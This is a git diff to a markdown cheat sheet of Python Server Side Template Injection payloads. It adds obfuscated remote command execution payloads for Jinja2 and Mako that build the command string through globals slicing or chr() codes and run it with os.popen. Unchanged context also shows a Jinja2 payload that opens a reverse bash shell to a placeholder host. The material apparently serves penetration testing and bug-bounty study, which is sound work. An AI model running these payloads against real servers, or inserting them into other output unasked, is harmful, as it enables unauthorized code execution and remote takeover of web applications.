diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md index 056d6057..3bf8b764 100644 --- a/Server Side Template Injection/Python.md +++ b/Server Side Template Injection/Python.md @@ -26,12 +26,14 @@ - [Exploit The SSTI By Calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen) - [Exploit The SSTI By Calling Popen Without Guessing The Offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset) - [Exploit The SSTI By Writing an Evil Config File](#exploit-the-ssti-by-writing-an-evil-config-file) + - [Jinja2 - Remote Command Execution with Obfuscation](#jinja2---remote-command-execution-with-obfuscation) - [Jinja2 - Filter Bypass](#jinja2---filter-bypass) - [Tornado](#tornado) - [Tornado - Basic Injection](#tornado---basic-injection) - [Tornado - Remote Command Execution](#tornado---remote-command-execution) - [Mako](#mako) - [Mako - Remote Command Execution](#mako---remote-command-execution) + - [Mako - Remote Command Execution with Obfuscation](#mako---remote-command-execution-with-obfuscation) - [References](#references) ## Templating Libraries @@ -260,6 +262,17 @@ Simple modification of the payload to clean up output and facilitate command inp {{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }} ``` +### Jinja2 - Remote Command Execution with Obfuscation + +Write the string: `id` using the index position of a known existing string (the index value may vary depending on the target): `{{self.__init__.__globals__.__str__()[1786:1788]}}`. + +Execute the system command `id`: +```python +{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(self.__init__.__globals__.__str__()[1786:1788]).read()}} +``` + +Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). + ### Jinja2 - Filter Bypass ```python @@ -400,6 +413,21 @@ PoC : ``` +### Mako - Remote Command Execution with Obfuscation + +In Mako, the following payload can be used to generates the string "id": `${str().join(chr(i)for(i)in[105,100])}`. + +Execute the system command `id`: +```python +${self.module.cache.util.os.popen(str().join(chr(i)for(i)in[105,100])).read()} +``` + +```python +<%import os%>${os.popen(str().join(chr(i)for(i)in[105,100])).read()} +``` + +Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). + ## References - [Cheatsheet - Flask & Jinja2 SSTI - phosphore - September 3, 2018](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) @@ -407,3 +435,4 @@ PoC : - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/) - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) - [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits) +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)